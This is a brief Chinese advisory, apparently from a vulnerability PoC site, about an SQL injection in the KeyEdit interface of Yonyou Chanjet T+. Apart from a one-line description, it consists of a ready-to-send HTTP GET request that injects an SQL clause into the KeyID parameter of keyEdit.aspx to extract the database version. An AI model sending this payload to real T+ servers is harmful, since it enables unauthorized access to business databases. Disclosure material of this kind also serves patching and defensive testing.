用友畅捷通T+ KeyEdit接口 SQL注入漏洞

日期: 2024-05-08 | 影响软件: 畅捷通T+ | POC: 已公开

漏洞描述

用友畅捷通T+ KeyEdit接口SQL注入漏洞

PoC代码

GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1

相关漏洞推荐